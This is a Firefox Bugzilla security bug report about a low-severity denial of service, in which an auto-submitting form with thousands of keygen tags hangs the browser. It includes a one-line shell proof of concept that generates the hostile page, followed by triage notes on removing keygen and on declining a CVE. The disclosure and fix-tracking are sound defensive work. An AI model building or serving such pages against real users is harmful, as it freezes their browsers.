Closed Bug 1524559 Opened 2 years ago Closed 2 years ago

Many keygen tags can make browser unusable

Categories

(Firefox :: Security, enhancement, P2)

enhancement

Tracking

()

RESOLVED FIXED
Firefox 69
Tracking Status
firefox-esr60 --- wontfix
firefox67 --- wontfix
firefox68 --- wontfix
firefox69 --- fixed

People

(Reporter: hanno, Assigned: jkt)

References

(Blocks 1 open bug)

Details

(Keywords: csectype-dos, sec-low, Whiteboard: [fixed by bug 1315460][post-critsmash-triage][adv-main69-])

By creating an auto-sending form that contains a large number of keygen tags one can make the browser practically unusable, only recoverable with killing the browser.

Example:
(echo '<form name=f>'; for i in $(seq 1 10000); do echo '<keygen name=a>'; done; echo '</form><script>document.f.submit();</script>') > poc.html

The popup created by keygen is window modal.

It's my understanding that keygen is planned for deprecation anyway, so maybe just accelerate the deprecation?

Ah, great, another one. And this one seems pretty bad, too.

Dana, do you know about the state of that keygen dialog? Can we remove it/pref it off? Otherwise we can just try and make it tab modal or rate-limit it.

Flags: needinfo?(dkeeler)
Keywords: csectype-dos
Priority: -- → P2

I'm not aware of a pref to turn it off, but I believe :jkt was working on removing it. We should just go ahead with that.

Flags: needinfo?(dkeeler) → needinfo?(jkt)
Keywords: sec-low

Seems like removing it is underway, we should close this bug once bug 1315460 lands on central.

Depends on: 1315460
Flags: needinfo?(jkt)
Assignee: nobody → jkt
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Whiteboard: [fixed by bug 1315460]
Group: firefox-core-security → core-security-release
Target Milestone: --- → Firefox 69
Flags: qe-verify-
Whiteboard: [fixed by bug 1315460] → [fixed by bug 1315460][post-critsmash-triage]
Alias: CVE-2019-11739
Whiteboard: [fixed by bug 1315460][post-critsmash-triage] → [fixed by bug 1315460][post-critsmash-triage][adv-main69-]

After discussion, we decided that as a DOS, this won't receive a CVE or an advisory (as we generally do neither for DOS issues). Apologies for any confusion.

Alias: CVE-2019-11739
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.